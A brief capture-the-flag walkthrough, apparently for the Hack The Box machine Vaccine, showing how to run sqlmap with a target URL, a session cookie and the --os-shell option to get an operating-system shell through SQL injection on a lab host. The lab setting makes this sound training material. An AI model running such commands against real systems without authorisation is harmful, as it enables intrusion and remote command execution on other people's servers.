sqlmap is used in the HTB machine Vaccine
First let's get the help using
sqlmap -hThis will help us structure our sqlmap query
1. We need to provide the target url
--url="http://10.129.247.166/dashboard.php?search=sandy"
2. We need to provide the PHPSESSID
--cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o"
3. We need to add --os-shell to get a shell
--os-shell can be used to get a shell
With all that info we can now construct our query as follow:
sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shellYour IP and your PHPSESSID will be different than mine
You will now be prompted to enter Y or N a couple of times. Just press enter for all.
We got the shell!